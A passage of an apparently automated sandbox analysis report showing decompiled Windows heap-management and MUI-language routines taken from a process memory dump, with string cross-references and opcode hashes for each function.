                                  						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                  					}
                                  					_v8 = _t280;
                                  				}
                                  				if(E018A1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                  					_v60 =  *_v8;
                                  					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                  					_v8 = _t280;
                                  				}
                                  				if(E018A1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                  					L16:
                                  					if(E018A1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                  						L28:
                                  						if(E018A1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                  							L46:
                                  							_t275 = _v16;
                                  							L47:
                                  							_t161 = 0;
                                  							L48:
                                  							if(_v8 != 0) {
                                  								L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                  							}
                                  							_t140 = _v20;
                                  							if(_t140 != 0) {
                                  								if(_t275 != 0) {
                                  									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                  									_t275 = 0;
                                  									_v28 = 0;
                                  									_t140 = _v20;
                                  								}
                                  							}
                                  							goto L50;
                                  						}
                                  						_t167 = _v12;
                                  						_t255 = _v12 + 4;
                                  						_v44 = _t255;
                                  						if(_t255 == 0) {
                                  							_t276 = _t280;
                                  							_v32 = _t280;
                                  						} else {
                                  							_t276 = L018B4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                  							_t167 = _v12;
                                  							_v32 = _t276;
                                  						}
                                  						if(_t276 == 0) {
                                  							_v44 = _t280;
                                  							_t280 = 0xc0000017;
                                  							goto L46;
                                  						} else {
                                  							E018DF3E0(_t276, _v8, _t167);
                                  							_v48 = _t276;
                                  							_t277 = E018E1370(_t276, 0x1874e90);
                                  							_pop(_t257);
                                  							if(_t277 == 0) {
                                  								L38:
                                  								_t170 = _v48;
                                  								if( *_v48 != 0) {
                                  									E018DBB40(0,  &_v68, _t170);
                                  									if(L018A43C0( &_v68,  &_v24) != 0) {
                                  										_t280 =  &(_t280[0]);
                                  									}
                                  								}
                                  								if(_t280 == 0) {
                                  									_t280 = 0;
                                  									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                  									_v44 = 0;
                                  									_v32 = 0;
                                  								} else {
                                  									_t280 = 0;
                                  								}
                                  								_t174 = _v8;
                                  								if(_v8 != 0) {
                                  									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                  								}
                                  								_v8 = _t280;
                                  								goto L46;
                                  							}
                                  							_t243 = _v48;
                                  							do {
                                  								 *_t277 = 0;
                                  								_t278 = _t277 + 2;
                                  								E018DBB40(_t257,  &_v68, _t243);
                                  								if(L018A43C0( &_v68,  &_v24) != 0) {
                                  									_t280 =  &(_t280[0]);
                                  								}
                                  								_t243 = _t278;
                                  								_t277 = E018E1370(_t278, 0x1874e90);
                                  								_pop(_t257);
                                  							} while (_t277 != 0);
                                  							_v48 = _t243;
                                  							_t242 = _v52;
                                  							goto L38;
                                  						}
                                  					}
                                  					_t191 = _v12;
                                  					_t260 = _v12 + 4;
                                  					_v28 = _t260;
                                  					if(_t260 == 0) {
                                  						_t275 = _t280;
                                  						_v16 = _t280;
                                  					} else {
                                  						_t275 = L018B4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                  						_t191 = _v12;
                                  						_v16 = _t275;
                                  					}
                                  					if(_t275 == 0) {
                                  						_v28 = _t280;
                                  						_t280 = 0xc0000017;
                                  						goto L47;
                                  					} else {
                                  						E018DF3E0(_t275, _v8, _t191);
                                  						_t285 = _t285 + 0xc;
                                  						_v48 = _t275;
                                  						_t279 = _t280;
                                  						_t281 = E018E1370(_v16, 0x1874e90);
                                  						_pop(_t262);
                                  						if(_t281 != 0) {
                                  							_t244 = _v48;
                                  							do {
                                  								 *_t281 = 0;
                                  								_t282 = _t281 + 2;
                                  								E018DBB40(_t262,  &_v68, _t244);
                                  								if(L018A43C0( &_v68,  &_v24) != 0) {
                                  									_t279 =  &(_t279[0]);
                                  								}
                                  								_t244 = _t282;
                                  								_t281 = E018E1370(_t282, 0x1874e90);
                                  								_pop(_t262);
                                  							} while (_t281 != 0);
                                  							_v48 = _t244;
                                  							_t242 = _v52;
                                  						}
                                  						_t201 = _v48;
                                  						_t280 = 0;
                                  						if( *_v48 != 0) {
                                  							E018DBB40(_t262,  &_v68, _t201);
                                  							if(L018A43C0( &_v68,  &_v24) != 0) {
                                  								_t279 =  &(_t279[0]);
                                  							}
                                  						}
                                  						if(_t279 == 0) {
                                  							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                  							_v28 = _t280;
                                  							_v16 = _t280;
                                  						}
                                  						_t202 = _v8;
                                  						if(_v8 != 0) {
                                  							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                  						}
                                  						_v8 = _t280;
                                  						goto L28;
                                  					}
                                  				}
                                  				_t214 = _v12;
                                  				_t264 = _v12 + 4;
                                  				_v40 = _t264;
                                  				if(_t264 == 0) {
                                  					_v20 = _t280;
                                  				} else {
                                  					_t236 = L018B4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                  					_t280 = _t236;
                                  					_v20 = _t236;
                                  					_t214 = _v12;
                                  				}
                                  				if(_t280 == 0) {
                                  					_t161 = 0;
                                  					_t280 = 0xc0000017;
                                  					_v40 = 0;
                                  					goto L48;
                                  				} else {
                                  					E018DF3E0(_t280, _v8, _t214);
                                  					_t285 = _t285 + 0xc;
                                  					_v48 = _t280;
                                  					_t283 = E018E1370(_t280, 0x1874e90);
                                  					_pop(_t267);
                                  					if(_t283 != 0) {
                                  						_t245 = _v48;
                                  						do {
                                  							 *_t283 = 0;
                                  							_t284 = _t283 + 2;
                                  							E018DBB40(_t267,  &_v68, _t245);
                                  							if(L018A43C0( &_v68,  &_v24) != 0) {
                                  								_t275 = _t275 + 1;
                                  							}
                                  							_t245 = _t284;
                                  							_t283 = E018E1370(_t284, 0x1874e90);
                                  							_pop(_t267);
                                  						} while (_t283 != 0);
                                  						_v48 = _t245;
                                  						_t242 = _v52;
                                  					}
                                  					_t224 = _v48;
                                  					_t280 = 0;
                                  					if( *_v48 != 0) {
                                  						E018DBB40(_t267,  &_v68, _t224);
                                  						if(L018A43C0( &_v68,  &_v24) != 0) {
                                  							_t275 = _t275 + 1;
                                  						}
                                  					}
                                  					if(_t275 == 0) {
                                  						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                  						_v40 = _t280;
                                  						_v20 = _t280;
                                  					}
                                  					_t225 = _v8;
                                  					if(_v8 != 0) {
                                  						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                  					}
                                  					_v8 = _t280;
                                  					goto L16;
                                  				}
                                  			}

                                  Strings
                                  • Kernel-MUI-Language-Allowed, xrefs: 018A3DC0
                                  • Kernel-MUI-Language-SKU, xrefs: 018A3F70
                                  • WindowsExcludedProcs, xrefs: 018A3D6F
                                  • Kernel-MUI-Number-Allowed, xrefs: 018A3D8C
                                  • Kernel-MUI-Language-Disallowed, xrefs: 018A3E97
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                  • API String ID: 0-258546922
                                  • Opcode ID: d90b2506a9a0d80a8f3a42d70fc6d5a4b37e2fbe98dfda57ac5eafa64e8539f9
                                  • Instruction ID: 6a1811e3cd96d4d6524b2f30269fb0554baa0e02ed2b3048cf1d2c0a57cfbdc9
                                  • Opcode Fuzzy Hash: d90b2506a9a0d80a8f3a42d70fc6d5a4b37e2fbe98dfda57ac5eafa64e8539f9
                                  • Instruction Fuzzy Hash: 9FF14872D00619EBDB11DF98C980AEEBBB9FF59750F15006AEA05E7250E7749F01CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 29%
                                  			E018940E1(void* __edx) {
                                  				void* _t19;
                                  				void* _t29;
                                  
                                  				_t28 = _t19;
                                  				_t29 = __edx;
                                  				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                  						_push("HEAP: ");
                                  						E0189B150();
                                  					} else {
                                  						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  					}
                                  					E0189B150("Invalid heap signature for heap at %p", _t28);
                                  					if(_t29 != 0) {
                                  						E0189B150(", passed to %s", _t29);
                                  					}
                                  					_push("\n");
                                  					E0189B150();
                                  					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                  						 *0x1986378 = 1;
                                  						asm("int3");
                                  						 *0x1986378 = 0;
                                  					}
                                  					return 0;
                                  				}
                                  				return 1;
                                  			}

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                  • API String ID: 0-188067316
                                  • Opcode ID: 200b5fe93469a4c0b20d651e0f3cf7327133aea1022151d50131b243e8dcd5a4
                                  • Instruction ID: 10c706ca7c52b17eeb82715b0a33f8b3f0bf3799578abf41751b4c0f7031f374
                                  • Opcode Fuzzy Hash: 200b5fe93469a4c0b20d651e0f3cf7327133aea1022151d50131b243e8dcd5a4
                                  • Instruction Fuzzy Hash: 13012832104A419EE725976DA48DFA677A4DB12F34F2C407EF105CB752DAE8D640C621
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E018BA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                                  				void* _v5;
                                  				signed short _v12;
                                  				intOrPtr _v16;
                                  				signed int _v20;
                                  				signed short _v24;
                                  				signed short _v28;
                                  				signed int _v32;
                                  				signed short _v36;
                                  				signed int _v40;
                                  				intOrPtr _v44;
                                  				intOrPtr _v48;
                                  				signed short* _v52;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __ebp;
                                  				signed int _t131;
                                  				signed char _t134;
                                  				signed int _t138;
                                  				char _t141;
                                  				signed short _t142;
                                  				void* _t146;
                                  				signed short _t147;
                                  				intOrPtr* _t149;
                                  				intOrPtr _t156;
                                  				signed int _t167;
                                  				signed int _t168;
                                  				signed short* _t173;
                                  				signed short _t174;
                                  				intOrPtr* _t182;
                                  				signed short _t184;
                                  				intOrPtr* _t187;
                                  				intOrPtr _t197;
                                  				intOrPtr _t206;
                                  				intOrPtr _t210;
                                  				signed short _t211;
                                  				intOrPtr* _t212;
                                  				signed short _t214;
                                  				signed int _t216;
                                  				intOrPtr _t217;
                                  				signed char _t225;
                                  				signed short _t235;
                                  				signed int _t237;
                                  				intOrPtr* _t238;
                                  				signed int _t242;
                                  				unsigned int _t245;
                                  				signed int _t251;
                                  				intOrPtr* _t252;
                                  				signed int _t253;
                                  				intOrPtr* _t255;
                                  				signed int _t256;
                                  				void* _t257;
                                  				void* _t260;
                                  
                                  				_t256 = __edx;
                                  				_t206 = __ecx;
                                  				_t235 = _a4;
                                  				_v44 = __ecx;
                                  				_v24 = _t235;
                                  				if(_t235 == 0) {
                                  					L41:
                                  					return _t131;
                                  				}
                                  				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                                  				if(_t251 == 0) {
                                  					__eflags =  *0x1988748 - 1;
                                  					if( *0x1988748 >= 1) {
                                  						__eflags =  *(__edx + 2) & 0x00000008;
                                  						if(( *(__edx + 2) & 0x00000008) == 0) {
                                  							_t110 = _t256 + 0xfff; // 0xfe7
                                  							__eflags = (_t110 & 0xfffff000) - __edx;
                                  							if((_t110 & 0xfffff000) != __edx) {
                                  								_t197 =  *[fs:0x30];
                                  								__eflags =  *(_t197 + 0xc);
                                  								if( *(_t197 + 0xc) == 0) {
                                  									_push("HEAP: ");
                                  									E0189B150();
                                  									_t260 = _t257 + 4;
                                  								} else {
                                  									E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  									_t260 = _t257 + 8;
                                  								}
                                  								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                                  								E0189B150();
                                  								_t257 = _t260 + 4;
                                  								__eflags =  *0x1987bc8;
                                  								if(__eflags == 0) {
                                  									E01952073(_t206, 1, _t251, __eflags);
                                  								}
                                  								_t235 = _v24;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				_t134 =  *((intOrPtr*)(_t256 + 6));
                                  				if(_t134 == 0) {
                                  					_t210 = _t206;
                                  					_v48 = _t206;
                                  				} else {
                                  					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                  					_v48 = _t210;
                                  				}
                                  				_v5 =  *(_t256 + 2);
                                  				do {
                                  					if(_t235 > 0xfe00) {
                                  						_v12 = 0xfe00;
                                  						__eflags = _t235 - 0xfe01;
                                  						if(_t235 == 0xfe01) {
                                  							_v12 = 0xfdf0;
                                  						}
                                  						_t138 = 0;
                                  					} else {
                                  						_v12 = _t235 & 0x0000ffff;
                                  						_t138 = _v5;
                                  					}
                                  					 *(_t256 + 2) = _t138;
                                  					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                                  					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                                  					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                                  						_t141 = 0;
                                  					} else {
                                  						_t141 = (_t256 - _t210 >> 0x10) + 1;
                                  						_v40 = _t141;
                                  						if(_t141 >= 0xfe) {
                                  							_push(_t210);
                                  							E0195A80D(_t236, _t256, _t210, 0);
                                  							_t141 = _v40;
                                  						}
                                  					}
                                  					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                                  					 *((char*)(_t256 + 6)) = _t141;
                                  					_t142 = _v12;
                                  					 *_t256 = _t142;
                                  					 *(_t256 + 3) = 0;
                                  					_t211 = _t142 & 0x0000ffff;
                                  					 *((char*)(_t256 + 7)) = 0;
                                  					_v20 = _t211;
                                  					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                                  						_t119 = _t256 + 0x10; // -8
                                  						E018ED5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                                  						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                                  						_t211 = _v20;
                                  					}
                                  					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                                  					if(_t252 == 0) {
                                  						L56:
                                  						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                                  						_t146 = _t206 + 0xc0;
                                  						goto L19;
                                  					} else {
                                  						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                                  							L15:
                                  							_t185 = _t211;
                                  							goto L17;
                                  						} else {
                                  							while(1) {
                                  								_t187 =  *_t252;
                                  								if(_t187 == 0) {
                                  									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                                  									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                                  									goto L17;
                                  								}
                                  								_t252 = _t187;
                                  								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                                  									continue;
                                  								}
                                  								goto L15;
                                  							}
                                  							while(1) {
                                  								L17:
                                  								_t212 = E018BAB40(_t206, _t252, 1, _t185, _t211);
                                  								if(_t212 != 0) {
                                  									_t146 = _t206 + 0xc0;
                                  									break;
                                  								}
                                  								_t252 =  *_t252;
                                  								_t211 = _v20;
                                  								_t185 =  *(_t252 + 0x14);
                                  							}
                                  							L19:
                                  							if(_t146 != _t212) {
                                  								_t237 =  *(_t206 + 0x4c);
                                  								_t253 = _v20;
                                  								while(1) {
                                  									__eflags = _t237;
                                  									if(_t237 == 0) {
                                  										_t147 =  *(_t212 - 8) & 0x0000ffff;
                                  									} else {
                                  										_t184 =  *(_t212 - 8);
                                  										_t237 =  *(_t206 + 0x4c);
                                  										__eflags = _t184 & _t237;
                                  										if((_t184 & _t237) != 0) {
                                  											_t184 = _t184 ^  *(_t206 + 0x50);
                                  											__eflags = _t184;
                                  										}
                                  										_t147 = _t184 & 0x0000ffff;
                                  									}
                                  									__eflags = _t253 - (_t147 & 0x0000ffff);
                                  									if(_t253 <= (_t147 & 0x0000ffff)) {
                                  										goto L20;
                                  									}
                                  									_t212 =  *_t212;
                                  									__eflags = _t206 + 0xc0 - _t212;
                                  									if(_t206 + 0xc0 != _t212) {
                                  										continue;
                                  									} else {
                                  										goto L20;
                                  									}
                                  									goto L56;
                                  								}
                                  							}
                                  							L20:
                                  							_t149 =  *((intOrPtr*)(_t212 + 4));
                                  							_t33 = _t256 + 8; // -16
                                  							_t238 = _t33;
                                  							_t254 =  *_t149;
                                  							if( *_t149 != _t212) {
                                  								_push(_t212);
                                  								E0195A80D(0, _t212, 0, _t254);
                                  							} else {
                                  								 *_t238 = _t212;
                                  								 *((intOrPtr*)(_t238 + 4)) = _t149;
                                  								 *_t149 = _t238;
                                  								 *((intOrPtr*)(_t212 + 4)) = _t238;
                                  							}
                                  							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                                  							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                                  							if(_t255 == 0) {
                                  								L36:
                                  								if( *(_t206 + 0x4c) != 0) {
                                  									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                                  									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                                  								}
                                  								_t210 = _v48;
                                  								_t251 = _v12 & 0x0000ffff;
                                  								_t131 = _v20;
                                  								_t235 = _v24 - _t131;
                                  								_v24 = _t235;
                                  								_t256 = _t256 + _t131 * 8;
                                  								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                                  									goto L41;
                                  								} else {
                                  									goto L39;
                                  								}
                                  							} else {
                                  								_t216 =  *_t256 & 0x0000ffff;
                                  								_v28 = _t216;
                                  								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                                  									L28:
                                  									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                                  									_v32 = _t242;
                                  									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                                  										_t167 = _t242 + _t242;
                                  									} else {
                                  										_t167 = _t242;
                                  									}
                                  									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                                  									_t168 = _t167 << 2;
                                  									_v40 = _t168;
                                  									_t206 = _v44;
                                  									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                                  									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                                  										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                                  									}
                                  									_t217 = _v16;
                                  									if(_t217 != 0) {
                                  										_t173 = _t217 - 8;
                                  										_v52 = _t173;
                                  										_t174 =  *_t173;
                                  										__eflags =  *(_t206 + 0x4c);
                                  										if( *(_t206 + 0x4c) != 0) {
                                  											_t245 =  *(_t206 + 0x50) ^ _t174;
                                  											_v36 = _t245;
                                  											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                                  											__eflags = _t245 >> 0x18 - _t225;
                                  											if(_t245 >> 0x18 != _t225) {
                                  												_push(_t225);
                                  												E0195A80D(_t206, _v52, 0, 0);
                                  											}
                                  											_t174 = _v36;
                                  											_t217 = _v16;
                                  											_t242 = _v32;
                                  										}
                                  										_v28 = _v28 - (_t174 & 0x0000ffff);
                                  										__eflags = _v28;
                                  										if(_v28 > 0) {
                                  											goto L34;
                                  										} else {
                                  											goto L33;
                                  										}
                                  									} else {
                                  										L33:
                                  										_t58 = _t256 + 8; // -16
                                  										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                                  										_t206 = _v44;
                                  										_t217 = _v16;
                                  										L34:
                                  										if(_t217 == 0) {
                                  											asm("bts eax, edx");
                                  										}
                                  										goto L36;
                                  									}
                                  								} else {
                                  									goto L24;
                                  								}
                                  								while(1) {
                                  									L24:
                                  									_t182 =  *_t255;
                                  									if(_t182 == 0) {
                                  										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                                  										__eflags = _t216;
                                  										goto L28;
                                  									}
                                  									_t255 = _t182;
                                  									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                                  										continue;
                                  									} else {
                                  										goto L28;
                                  									}
                                  								}
                                  								goto L28;
                                  							}
                                  						}
                                  					}
                                  					L39:
                                  				} while (_t235 != 0);
                                  				_t214 = _v12;
                                  				_t131 =  *(_t206 + 0x54) ^ _t214;
                                  				 *(_t256 + 4) = _t131;
                                  				if(_t214 == 0) {
                                  					__eflags =  *0x1988748 - 1;
                                  					if( *0x1988748 >= 1) {
                                  						_t127 = _t256 + 0xfff; // 0xfff
                                  						_t131 = _t127 & 0xfffff000;
                                  						__eflags = _t131 - _t256;
                                  						if(_t131 != _t256) {
                                  							_t156 =  *[fs:0x30];
                                  							__eflags =  *(_t156 + 0xc);
                                  							if( *(_t156 + 0xc) == 0) {
                                  								_push("HEAP: ");
                                  								E0189B150();
                                  							} else {
                                  								E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  							}
                                  							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                                  							_t131 = E0189B150();
                                  							__eflags =  *0x1987bc8;
                                  							if(__eflags == 0) {
                                  								_t131 = E01952073(_t206, 1, _t251, __eflags);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				goto L41;
                                  			}

                                  Strings
                                  • HEAP[%wZ]: , xrefs: 019022D7, 019023E7
                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01902403
                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 019022F3
                                  • HEAP: , xrefs: 019022E6, 019023F6
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                  • API String ID: 0-1657114761
                                  • Opcode ID: 5615d901377bf8fd1c73cf9cd2c3f9e1f0195032f01d5d354084786dfabe7fd0
                                  • Instruction ID: dafe782a4ffec24e123f3d0b91e9618f95c508c262b7018af55fc5944d27a9cd
                                  • Opcode Fuzzy Hash: 5615d901377bf8fd1c73cf9cd2c3f9e1f0195032f01d5d354084786dfabe7fd0
                                  • Instruction Fuzzy Hash: F2D1CF74A006069FDB29CF68C4D0BBABBF1BF48304F148569D95ADB781E334EA45CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 69%
                                  			E018BA229(void* __ecx, void* __edx) {
                                  				signed int _v20;
                                  				char _v24;
                                  				char _v28;
                                  				void* _v44;
                                  				void* _v48;
                                  				void* _v56;
                                  				void* _v60;
                                  				void* __ebx;
                                  				signed int _t55;
                                  				signed int _t57;
                                  				void* _t61;
                                  				intOrPtr _t62;
                                  				void* _t65;
                                  				void* _t71;
                                  				signed char* _t74;
                                  				intOrPtr _t75;
                                  				signed char* _t80;
                                  				intOrPtr _t81;
                                  				void* _t82;
                                  				signed char* _t85;
                                  				signed char _t91;
                                  				void* _t103;
                                  				void* _t105;
                                  				void* _t121;
                                  				void* _t129;
                                  				signed int _t131;
                                  				void* _t133;
                                  
                                  				_t105 = __ecx;
                                  				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                  				_t103 = __edx;
                                  				_t129 = __ecx;
                                  				E018BDF24(__edx,  &_v28, _t133);
                                  				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                  				asm("sbb edi, edi");
                                  				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                  				if(_t55 != 0) {
                                  					_push(0);
                                  					_push(0x14);
                                  					_push( &_v24);
                                  					_push(3);
                                  					_push(_t129);
                                  					_push(0xffffffff);
                                  					_t57 = E018D9730();
                                  					__eflags = _t57;
                                  					if(_t57 < 0) {
                                  						L17:
                                  						_push(_t105);
                                  						E0195A80D(_t129, 1, _v20, 0);
                                  						_t121 = 4;
                                  						goto L1;
                                  					}
                                  					__eflags = _v20 & 0x00000060;
                                  					if((_v20 & 0x00000060) == 0) {
                                  						goto L17;
                                  					}
                                  					__eflags = _v24 - _t129;
                                  					if(_v24 == _t129) {
                                  						goto L1;
                                  					}
                                  					goto L17;
                                  				}
                                  				L1:
                                  				_push(_t121);
                                  				_push(0x1000);
                                  				_push(_t133 + 0x14);
                                  				_push(0);
                                  				_push(_t133 + 0x20);
                                  				_push(0xffffffff);
                                  				_t61 = E018D9660();
                                  				_t122 = _t61;
                                  				if(_t61 < 0) {
                                  					_t62 =  *[fs:0x30];
                                  					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                  					__eflags =  *(_t62 + 0xc);
                                  					if( *(_t62 + 0xc) == 0) {
                                  						_push("HEAP: ");
                                  						E0189B150();
                                  					} else {
                                  						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  					}
                                  					_push( *((intOrPtr*)(_t133 + 0xc)));
                                  					_push( *((intOrPtr*)(_t133 + 0x14)));
                                  					_push(_t129);
                                  					E0189B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                  					_t65 = 0;
                                  					L13:
                                  					return _t65;
                                  				}
                                  				_t71 = E018B7D50();
                                  				_t124 = 0x7ffe0380;
                                  				if(_t71 != 0) {
                                  					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  				} else {
                                  					_t74 = 0x7ffe0380;
                                  				}
                                  				if( *_t74 != 0) {
                                  					_t75 =  *[fs:0x30];
                                  					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                  					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                  						E0195138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                  					}
                                  				}
                                  				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                  				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                  				if(E018B7D50() != 0) {
                                  					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  				} else {
                                  					_t80 = _t124;
                                  				}
                                  				if( *_t80 != 0) {
                                  					_t81 =  *[fs:0x30];
                                  					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                  					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                  						__eflags = E018B7D50();
                                  						if(__eflags != 0) {
                                  							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  						}
                                  						E01951582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                  					}
                                  				}
                                  				_t82 = E018B7D50();
                                  				_t125 = 0x7ffe038a;
                                  				if(_t82 != 0) {
                                  					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                  				} else {
                                  					_t85 = 0x7ffe038a;
                                  				}
                                  				if( *_t85 != 0) {
                                  					__eflags = E018B7D50();
                                  					if(__eflags != 0) {
                                  						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                  						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                  					}
                                  					E01951582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                  				}
                                  				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                  				_t91 =  *(_t103 + 2);
                                  				if((_t91 & 0x00000004) != 0) {
                                  					E018ED5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
